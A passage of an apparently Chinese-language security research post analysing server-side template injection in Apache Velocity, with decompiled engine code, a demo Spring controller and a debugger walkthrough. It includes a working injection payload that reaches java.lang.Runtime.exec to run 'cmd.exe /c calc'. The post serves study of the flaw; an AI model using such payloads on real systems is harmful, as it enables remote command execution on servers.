<span class=k>if</span> <span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>getLog</span><span class=p>().</span><span class=n>isDebugEnabled</span><span class=p>())</span> <span class=p>{</span>
<span class=n>this</span><span class=p>.</span><span class=n>getLog</span><span class=p>().</span><span class=n>debug</span><span class=p>(</span><span class=n>var21</span><span class=p>.</span><span class=n>getMessage</span><span class=p>());</span>
<span class=p>}</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>IOException</span> <span class=n>var22</span><span class=p>)</span> <span class=p>{</span>
<span class=n>throw</span> <span class=n>new</span> <span class=n>VelocityException</span><span class=p>(</span><span class=s>"IO Error in writer: "</span> <span class=o>+</span> <span class=n>var22</span><span class=p>.</span><span class=n>getMessage</span><span class=p>(),</span> <span class=n>var22</span><span class=p>);</span>
<span class=p>}</span>
<span class=p>}</span> <span class=n>finally</span> <span class=p>{</span>
<span class=n>ica</span><span class=p>.</span><span class=n>popCurrentTemplateName</span><span class=p>();</span>
<span class=k>if</span> <span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>provideEvaluateScope</span><span class=p>)</span> <span class=p>{</span>
<span class=n>Object</span> <span class=n>obj</span> <span class=o>=</span> <span class=n>ica</span><span class=p>.</span><span class=n>get</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>evaluateScopeName</span><span class=p>);</span>
<span class=k>if</span> <span class=p>(</span><span class=n>obj</span> <span class=n>instanceof</span> <span class=n>Scope</span><span class=p>)</span> <span class=p>{</span>
<span class=n>Scope</span> <span class=n>scope</span> <span class=o>=</span> <span class=p>(</span><span class=n>Scope</span><span class=p>)</span><span class=n>obj</span><span class=p>;</span>
<span class=k>if</span> <span class=p>(</span><span class=n>scope</span><span class=p>.</span><span class=n>getParent</span><span class=p>()</span> <span class=o>!=</span> <span class=n>null</span><span class=p>)</span> <span class=p>{</span>
<span class=n>ica</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>evaluateScopeName</span><span class=p>,</span> <span class=n>scope</span><span class=p>.</span><span class=n>getParent</span><span class=p>());</span>
<span class=p>}</span> <span class=k>else</span> <span class=k>if</span> <span class=p>(</span><span class=n>scope</span><span class=p>.</span><span class=n>getReplaced</span><span class=p>()</span> <span class=o>!=</span> <span class=n>null</span><span class=p>)</span> <span class=p>{</span>
<span class=n>ica</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>evaluateScopeName</span><span class=p>,</span> <span class=n>scope</span><span class=p>.</span><span class=n>getReplaced</span><span class=p>());</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>ica</span><span class=p>.</span><span class=n>remove</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>evaluateScopeName</span><span class=p>);</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=k>return</span> <span class=nb>true</span><span class=p>;</span>
<span class=p>}</span>
</pre></div>
<p>随后通过render将模板的内容渲染到指定的Writer中,jjtGetNumChildren()用于获取子节点数量,this.jjtGetChild(i)获取第i个子节点,对每个子节点调用其render方法将上下文和写入器作为参数传递:</p>
<p><a id=img10 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101436-1d38561e-5f63-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101436-1d38561e-5f63-1.png></a><br>
render的具体实现如下所示,在这里会调用execute方法来进行具体的解析操作:</p>
<p><a id=img11 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101511-31f23b38-5f63-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101511-31f23b38-5f63-1.png></a></p>
<p>execute的执行代码如下所示,可以看到这里的children即为我们传入的参数值:</p>
<p><a id=img12 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101525-3a60963e-5f63-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101525-3a60963e-5f63-1.png></a></p>
<div class=highlight><pre><span></span><span class=n>public</span> <span class=n>Object</span> <span class=nf>execute</span><span class=p>(</span><span class=n>Object</span> <span class=n>o</span><span class=p>,</span> <span class=n>InternalContextAdapter</span> <span class=n>context</span><span class=p>)</span> <span class=n>throws</span> <span class=n>MethodInvocationException</span> <span class=p>{</span>
<span class=k>if</span> <span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>referenceType</span> <span class=o>==</span> <span class=mi>4</span><span class=p>)</span> <span class=p>{</span>
<span class=k>return</span> <span class=n>null</span><span class=p>;</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>Object</span> <span class=n>result</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>getVariableValue</span><span class=p>(</span><span class=n>context</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>rootString</span><span class=p>);</span>
<span class=k>if</span> <span class=p>(</span><span class=n>result</span> <span class=o>==</span> <span class=n>null</span> <span class=o>&&</span> <span class=o>!</span><span class=n>this</span><span class=p>.</span><span class=n>strictRef</span><span class=p>)</span> <span class=p>{</span>
<span class=k>return</span> <span class=n>EventHandlerUtil</span><span class=p>.</span><span class=n>invalidGetMethod</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>,</span> <span class=n>context</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>getDollarBang</span><span class=p>()</span> <span class=o>+</span> <span class=n>this</span><span class=p>.</span><span class=n>rootString</span><span class=p>,</span> <span class=p>(</span><span class=n>Object</span><span class=p>)</span><span class=n>null</span><span class=p>,</span> <span class=p>(</span><span class=n>String</span><span class=p>)</span><span class=n>null</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>uberInfo</span><span class=p>);</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>try</span> <span class=p>{</span>
<span class=n>Object</span> <span class=n>previousResult</span> <span class=o>=</span> <span class=n>result</span><span class=p>;</span>
<span class=kt>int</span> <span class=n>failedChild</span> <span class=o>=</span> <span class=o>-</span><span class=mi>1</span><span class=p>;</span>
<span class=n>String</span> <span class=n>methodName</span><span class=p>;</span>
<span class=k>for</span><span class=p>(</span><span class=kt>int</span> <span class=n>i</span> <span class=o>=</span> <span class=mi>0</span><span class=p>;</span> <span class=n>i</span> <span class=o><</span> <span class=n>this</span><span class=p>.</span><span class=n>numChildren</span><span class=p>;</span> <span class=o>++</span><span class=n>i</span><span class=p>)</span> <span class=p>{</span>
<span class=k>if</span> <span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>strictRef</span> <span class=o>&&</span> <span class=n>result</span> <span class=o>==</span> <span class=n>null</span><span class=p>)</span> <span class=p>{</span>
<span class=n>methodName</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>i</span><span class=p>).</span><span class=n>getFirstToken</span><span class=p>().</span><span class=n>image</span><span class=p>;</span>
<span class=n>throw</span> <span class=n>new</span> <span class=n>VelocityException</span><span class=p>(</span><span class=s>"Attempted to access '"</span> <span class=o>+</span> <span class=n>methodName</span> <span class=o>+</span> <span class=s>"' on a null value at "</span> <span class=o>+</span> <span class=n>Log</span><span class=p>.</span><span class=n>formatFileString</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>uberInfo</span><span class=p>.</span><span class=n>getTemplateName</span><span class=p>(),</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>i</span><span class=p>).</span><span class=n>getLine</span><span class=p>(),</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>i</span><span class=p>).</span><span class=n>getColumn</span><span class=p>()));</span>
<span class=p>}</span>
<span class=n>previousResult</span> <span class=o>=</span> <span class=n>result</span><span class=p>;</span>
<span class=n>result</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>i</span><span class=p>).</span><span class=n>execute</span><span class=p>(</span><span class=n>result</span><span class=p>,</span> <span class=n>context</span><span class=p>);</span>
<span class=k>if</span> <span class=p>(</span><span class=n>result</span> <span class=o>==</span> <span class=n>null</span> <span class=o>&&</span> <span class=o>!</span><span class=n>this</span><span class=p>.</span><span class=n>strictRef</span><span class=p>)</span> <span class=p>{</span>
<span class=n>failedChild</span> <span class=o>=</span> <span class=n>i</span><span class=p>;</span>
<span class=k>break</span><span class=p>;</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=k>if</span> <span class=p>(</span><span class=n>result</span> <span class=o>==</span> <span class=n>null</span><span class=p>)</span> <span class=p>{</span>
<span class=k>if</span> <span class=p>(</span><span class=n>failedChild</span> <span class=o>==</span> <span class=o>-</span><span class=mi>1</span><span class=p>)</span> <span class=p>{</span>
<span class=n>result</span> <span class=o>=</span> <span class=n>EventHandlerUtil</span><span class=p>.</span><span class=n>invalidGetMethod</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>,</span> <span class=n>context</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>getDollarBang</span><span class=p>()</span> <span class=o>+</span> <span class=n>this</span><span class=p>.</span><span class=n>rootString</span><span class=p>,</span> <span class=n>previousResult</span><span class=p>,</span> <span class=p>(</span><span class=n>String</span><span class=p>)</span><span class=n>null</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>uberInfo</span><span class=p>);</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>StringBuffer</span> <span class=n>name</span> <span class=o>=</span> <span class=p>(</span><span class=n>new</span> <span class=n>StringBuffer</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>getDollarBang</span><span class=p>())).</span><span class=n>append</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rootString</span><span class=p>);</span>
<span class=k>for</span><span class=p>(</span><span class=kt>int</span> <span class=n>i</span> <span class=o>=</span> <span class=mi>0</span><span class=p>;</span> <span class=n>i</span> <span class=o><=</span> <span class=n>failedChild</span><span class=p>;</span> <span class=o>++</span><span class=n>i</span><span class=p>)</span> <span class=p>{</span>
<span class=n>Node</span> <span class=n>node</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>i</span><span class=p>);</span>
<span class=k>if</span> <span class=p>(</span><span class=n>node</span> <span class=n>instanceof</span> <span class=n>ASTMethod</span><span class=p>)</span> <span class=p>{</span>
<span class=n>name</span><span class=p>.</span><span class=n>append</span><span class=p>(</span><span class=s>"."</span><span class=p>).</span><span class=n>append</span><span class=p>(((</span><span class=n>ASTMethod</span><span class=p>)</span><span class=n>node</span><span class=p>).</span><span class=n>getMethodName</span><span class=p>()).</span><span class=n>append</span><span class=p>(</span><span class=s>"()"</span><span class=p>);</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>name</span><span class=p>.</span><span class=n>append</span><span class=p>(</span><span class=s>"."</span><span class=p>).</span><span class=n>append</span><span class=p>(</span><span class=n>node</span><span class=p>.</span><span class=n>getFirstToken</span><span class=p>().</span><span class=n>image</span><span class=p>);</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=k>if</span> <span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>failedChild</span><span class=p>)</span> <span class=n>instanceof</span> <span class=n>ASTMethod</span><span class=p>)</span> <span class=p>{</span>
<span class=n>methodName</span> <span class=o>=</span> <span class=p>((</span><span class=n>ASTMethod</span><span class=p>)</span><span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>failedChild</span><span class=p>)).</span><span class=n>getMethodName</span><span class=p>();</span>
<span class=n>result</span> <span class=o>=</span> <span class=n>EventHandlerUtil</span><span class=p>.</span><span class=n>invalidMethod</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>,</span> <span class=n>context</span><span class=p>,</span> <span class=n>name</span><span class=p>.</span><span class=n>toString</span><span class=p>(),</span> <span class=n>previousResult</span><span class=p>,</span> <span class=n>methodName</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>uberInfo</span><span class=p>);</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>methodName</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>failedChild</span><span class=p>).</span><span class=n>getFirstToken</span><span class=p>().</span><span class=n>image</span><span class=p>;</span>
<span class=n>result</span> <span class=o>=</span> <span class=n>EventHandlerUtil</span><span class=p>.</span><span class=n>invalidGetMethod</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>,</span> <span class=n>context</span><span class=p>,</span> <span class=n>name</span><span class=p>.</span><span class=n>toString</span><span class=p>(),</span> <span class=n>previousResult</span><span class=p>,</span> <span class=n>methodName</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>uberInfo</span><span class=p>);</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=k>return</span> <span class=n>result</span><span class=p>;</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>MethodInvocationException</span> <span class=n>var9</span><span class=p>)</span> <span class=p>{</span>
<span class=n>var9</span><span class=p>.</span><span class=n>setReferenceName</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rootString</span><span class=p>);</span>
<span class=n>throw</span> <span class=n>var9</span><span class=p>;</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=p>}</span>
</pre></div>
<p>通过反射获取执行的类</p>
<p><a id=img13 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101548-47df99ae-5f63-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101548-47df99ae-5f63-1.png></a></p>
<p>最终递归解析到"cmd.exe /c calc"</p>
<p><a id=img14 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101602-501a5a28-5f63-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101602-501a5a28-5f63-1.png></a></p>
<p>最后完成解析执行:</p>
<p><a id=img15 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821101618-59974cf0-5f63-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821101618-59974cf0-5f63-1.png></a></p>
<h4>template.merge(ctx, out)</h4>
<h5>方法介绍</h5>
<p>在Java的Velocity模板引擎中template.merge(ctx, out)是一个关键的方法,它主要用于将模板与给定的上下文数据合并,同时将结果输出到指定的目标,方法格式如下所示:</p>
<div class=highlight><pre><span></span><span class=kt>void</span> <span class=n>merge</span><span class=p>(</span><span class=n>Context</span> <span class=n>context</span><span class=p>,</span> <span class=n>Writer</span> <span class=n>writer</span><span class=p>)</span>
</pre></div>
<p>参数说明:</p>
<ul>
<li>Context context:包含动态数据的上下文对象,通常是VelocityContext的实例,使用上下文可以为模板提供变量和数据,使得模板能够在渲染时采用这些值</li>
<li>Writer writer: Writer类型的对象指定了合并后内容的输出目标,常见的实现包括 StringWriter, PrintWriter 等,可以将生成的内容写入字符串、文件或其他输出流</li>
</ul>
<h5>示例代码</h5>
<p>Step 1:添加依赖<br>
在pom.xml中添加以下依赖:</p>
<div class=highlight><pre><span></span><span class=o><!--</span> <span class=nl>https</span><span class=p>:</span><span class=c1>//mvnrepository.com/artifact/org.apache.velocity/velocity --></span>
<span class=o><</span><span class=n>dependency</span><span class=o>></span>
<span class=o><</span><span class=n>groupId</span><span class=o>></span><span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=o></</span><span class=n>groupId</span><span class=o>></span>
<span class=o><</span><span class=n>artifactId</span><span class=o>></span><span class=n>velocity</span><span class=o></</span><span class=n>artifactId</span><span class=o>></span>
<span class=o><</span><span class=n>version</span><span class=o>></span><span class=mf>1.7</span><span class=o></</span><span class=n>version</span><span class=o>></span>
<span class=o></</span><span class=n>dependency</span><span class=o>></span>
</pre></div>
<p>Step 2:创建模板文件<br>
在项目的src/main/resources/templates目录下创建一个名为template.vm的文件,内容如下</p>
<div class=highlight><pre><span></span><span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=n>name</span><span class=o>!</span>
<span class=cp>#set($totalPrice = $price * $quantity)</span>
<span class=n>The</span> <span class=n>total</span> <span class=n>cost</span> <span class=k>for</span> <span class=err>$</span><span class=n>quantity</span> <span class=n>items</span> <span class=n>at</span> <span class=err>$</span><span class=n>price</span> <span class=n>each</span> <span class=nl>is</span><span class=p>:</span> <span class=err>$</span><span class=n>totalPrice</span><span class=p>.</span>
<span class=cp>#foreach($item in $items)</span>
<span class=o>-</span> <span class=nl>Item</span><span class=p>:</span> <span class=err>$</span><span class=n>item</span>
<span class=cp>#end</span>
</pre></div>
<p>Step 3:创建Controller类<br>
接下来我们创建一个控制器类用于处理请求并返回渲染后的模板</p>
<div class=highlight><pre><span></span><span class=n>package</span> <span class=n>com</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>velocitytest</span><span class=p>.</span><span class=n>controller</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>Template</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>app</span><span class=p>.</span><span class=n>VelocityEngine</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>context</span><span class=p>.</span><span class=n>Context</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>VelocityContext</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>springframework</span><span class=p>.</span><span class=n>beans</span><span class=p>.</span><span class=n>factory</span><span class=p>.</span><span class=n>annotation</span><span class=p>.</span><span class=n>Autowired</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>springframework</span><span class=p>.</span><span class=n>web</span><span class=p>.</span><span class=n>bind</span><span class=p>.</span><span class=n>annotation</span><span class=p>.</span><span class=n>GetMapping</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>springframework</span><span class=p>.</span><span class=n>web</span><span class=p>.</span><span class=n>bind</span><span class=p>.</span><span class=n>annotation</span><span class=p>.</span><span class=n>RequestParam</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>springframework</span><span class=p>.</span><span class=n>web</span><span class=p>.</span><span class=n>bind</span><span class=p>.</span><span class=n>annotation</span><span class=p>.</span><span class=n>RestController</span><span class=p>;</span>
<span class=n>import</span> <span class=n>java</span><span class=p>.</span><span class=n>io</span><span class=p>.</span><span class=n>StringWriter</span><span class=p>;</span>
<span class=n>import</span> <span class=n>java</span><span class=p>.</span><span class=n>util</span><span class=p>.</span><span class=n>Arrays</span><span class=p>;</span>
<span class=err>@</span><span class=n>RestController</span>
<span class=n>public</span> <span class=n>class</span> <span class=n>VelocityController</span> <span class=p>{</span>
<span class=n>private</span> <span class=n>final</span> <span class=n>VelocityEngine</span> <span class=n>velocityEngine</span><span class=p>;</span>
<span class=err>@</span><span class=n>Autowired</span>
<span class=n>public</span> <span class=n>VelocityController</span><span class=p>(</span><span class=n>VelocityEngine</span> <span class=n>velocityEngine</span><span class=p>)</span> <span class=p>{</span> <span class=c1>//通过构造函数注入方式获得Velocity引擎实例</span>
<span class=n>this</span><span class=p>.</span><span class=n>velocityEngine</span> <span class=o>=</span> <span class=n>velocityEngine</span><span class=p>;</span>
<span class=p>}</span>
<span class=err>@</span><span class=n>GetMapping</span><span class=p>(</span><span class=s>"/generate"</span><span class=p>)</span>
<span class=n>public</span> <span class=n>String</span> <span class=n>generate</span><span class=p>(</span><span class=err>@</span><span class=n>RequestParam</span> <span class=n>String</span> <span class=n>name</span><span class=p>,</span>
<span class=err>@</span><span class=n>RequestParam</span> <span class=kt>double</span> <span class=n>price</span><span class=p>,</span>
<span class=err>@</span><span class=n>RequestParam</span> <span class=kt>int</span> <span class=n>quantity</span><span class=p>)</span> <span class=p>{</span>
<span class=c1>// Step 1: 加载模板</span>
<span class=n>Template</span> <span class=n>template</span> <span class=o>=</span> <span class=n>velocityEngine</span><span class=p>.</span><span class=n>getTemplate</span><span class=p>(</span><span class=s>"template.vm"</span><span class=p>);</span>
<span class=c1>// Step 2: 创建上下文并填充数据</span>
<span class=n>Context</span> <span class=n>context</span> <span class=o>=</span> <span class=n>new</span> <span class=n>VelocityContext</span><span class=p>();</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"name"</span><span class=p>,</span> <span class=n>name</span><span class=p>);</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"price"</span><span class=p>,</span> <span class=n>price</span><span class=p>);</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"quantity"</span><span class=p>,</span> <span class=n>quantity</span><span class=p>);</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"items"</span><span class=p>,</span> <span class=n>Arrays</span><span class=p>.</span><span class=n>asList</span><span class=p>(</span><span class=s>"Apple"</span><span class=p>,</span> <span class=s>"Banana"</span><span class=p>,</span> <span class=s>"Cherry"</span><span class=p>));</span>
<span class=c1>// Step 3: 合并模板和上下文</span>
<span class=n>StringWriter</span> <span class=n>writer</span> <span class=o>=</span> <span class=n>new</span> <span class=n>StringWriter</span><span class=p>();</span>
<span class=n>template</span><span class=p>.</span><span class=n>merge</span><span class=p>(</span><span class=n>context</span><span class=p>,</span> <span class=n>writer</span><span class=p>);</span>
<span class=c1>// 返回结果</span>
<span class=k>return</span> <span class=n>writer</span><span class=p>.</span><span class=n>toString</span><span class=p>();</span>
<span class=p>}</span>
<span class=p>}</span>
</pre></div>
<p>Step 4:配置Velocity<br>
为了使Velocity引擎可以工作,我们需要在Spring Boot应用程序中进行一些配置,创建一个配置类如下所示</p>
<div class=highlight><pre><span></span><span class=n>package</span> <span class=n>com</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>velocitytest</span><span class=p>.</span><span class=n>config</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>app</span><span class=p>.</span><span class=n>VelocityEngine</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>springframework</span><span class=p>.</span><span class=n>context</span><span class=p>.</span><span class=n>annotation</span><span class=p>.</span><span class=n>Bean</span><span class=p>;</span>
<span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>springframework</span><span class=p>.</span><span class=n>context</span><span class=p>.</span><span class=n>annotation</span><span class=p>.</span><span class=n>Configuration</span><span class=p>;</span>
<span class=n>import</span> <span class=n>java</span><span class=p>.</span><span class=n>util</span><span class=p>.</span><span class=n>Properties</span><span class=p>;</span>
<span class=err>@</span><span class=n>Configuration</span>
<span class=n>public</span> <span class=n>class</span> <span class=n>VelocityConfig</span> <span class=p>{</span>
<span class=err>@</span><span class=n>Bean</span>
<span class=n>public</span> <span class=n>VelocityEngine</span> <span class=n>velocityEngine</span><span class=p>()</span> <span class=p>{</span>
<span class=n>Properties</span> <span class=n>props</span> <span class=o>=</span> <span class=n>new</span> <span class=n>Properties</span><span class=p>();</span>
<span class=n>props</span><span class=p>.</span><span class=n>setProperty</span><span class=p>(</span><span class=s>"resource.loader"</span><span class=p>,</span> <span class=s>"file"</span><span class=p>);</span>
<span class=n>props</span><span class=p>.</span><span class=n>setProperty</span><span class=p>(</span><span class=s>"file.resource.loader.path"</span><span class=p>,</span> <span class=s>"src/main/resources/templates"</span><span class=p>);</span> <span class=c1>// 模板路径</span>
<span class=n>VelocityEngine</span> <span class=n>velocityEngine</span> <span class=o>=</span> <span class=n>new</span> <span class=n>VelocityEngine</span><span class=p>(</span><span class=n>props</span><span class=p>);</span>
<span class=n>velocityEngine</span><span class=p>.</span><span class=n>init</span><span class=p>();</span>
<span class=k>return</span> <span class=n>velocityEngine</span><span class=p>;</span>
<span class=p>}</span>
<span class=p>}</span>
</pre></div>
<p>Step 5:运行项目并进行访问</p>
<div class=highlight><pre><span></span><span class=nl>http</span><span class=p>:</span><span class=c1>//localhost:8080/generate?name=Alice&price=10.99&quantity=3</span>
</pre></div>
<p><a id=img16 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102003-dfc60596-5f63-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102003-dfc60596-5f63-1.png></a></p>
<p>通过上面的菲尼我们可以构造如下payload:</p>
<div class=highlight><pre><span></span><span class=n>username</span><span class=o>=</span><span class=err>#</span><span class=n>set</span><span class=p>(</span><span class=err>$</span><span class=n>e</span><span class=o>=</span><span class=s>"e"</span><span class=p>)</span><span class=err>$</span><span class=n>e</span><span class=p>.</span><span class=n>getClass</span><span class=p>().</span><span class=n>forName</span><span class=p>(</span><span class=s>"java.lang.Runtime"</span><span class=p>).</span><span class=n>getMethod</span><span class=p>(</span><span class=s>"getRuntime"</span><span class=p>,</span><span class=n>null</span><span class=p>).</span><span class=n>invoke</span><span class=p>(</span><span class=n>null</span><span class=p>,</span><span class=n>null</span><span class=p>).</span><span class=n>exec</span><span class=p>(</span><span class=s>"cmd.exe /c calc"</span><span class=p>)</span>
</pre></div>
<p><a id=img17 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102027-ee2e30e0-5f63-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102027-ee2e30e0-5f63-1.png></a></p>
<h5>调试分析</h5>
<p>下面我们简易分析一下如何通过控制模板文件造成命令执行的过程,首先我们在template.merge处下断点:</p>
<p><a id=img18 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102135-16ed61a4-5f64-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102135-16ed61a4-5f64-1.png></a></p>
<p>随后在merge中调用当前类的merge:</p>
<p><a id=img19 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102149-1f12d72e-5f64-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102149-1f12d72e-5f64-1.png></a></p>
<p>随后调用render方法进行渲染:</p>
<p><a id=img20 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102203-27a7da1a-5f64-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102203-27a7da1a-5f64-1.png></a><br>
随后通过render将模板的内容渲染到指定的Writer中,jjtGetNumChildren()用于获取子节点数量,this.jjtGetChild(i)获取第i个子节点,对每个子节点调用其render方法将上下文和写入器作为参数传递:</p>
<p><a id=img21 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102216-2f4db8b6-5f64-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102216-2f4db8b6-5f64-1.png></a></p>
<p>render的具体实现如下所示,在这里会调用execute方法来进行具体的解析操作:</p>
<p><a id=img22 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102230-3754ccde-5f64-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102230-3754ccde-5f64-1.png></a></p>
<p>execute的执行代码如下所示:</p>
<p><a id=img23 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102243-3f19e6b6-5f64-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102243-3f19e6b6-5f64-1.png></a></p>
<div class=highlight><pre><span></span><span class=n>public</span> <span class=n>Object</span> <span class=nf>execute</span><span class=p>(</span><span class=n>Object</span> <span class=n>o</span><span class=p>,</span> <span class=n>InternalContextAdapter</span> <span class=n>context</span><span class=p>)</span> <span class=n>throws</span> <span class=n>MethodInvocationException</span> <span class=p>{</span>
<span class=k>if</span> <span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>referenceType</span> <span class=o>==</span> <span class=mi>4</span><span class=p>)</span> <span class=p>{</span>
<span class=k>return</span> <span class=n>null</span><span class=p>;</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>Object</span> <span class=n>result</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>getVariableValue</span><span class=p>(</span><span class=n>context</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>rootString</span><span class=p>);</span>
<span class=k>if</span> <span class=p>(</span><span class=n>result</span> <span class=o>==</span> <span class=n>null</span> <span class=o>&&</span> <span class=o>!</span><span class=n>this</span><span class=p>.</span><span class=n>strictRef</span><span class=p>)</span> <span class=p>{</span>
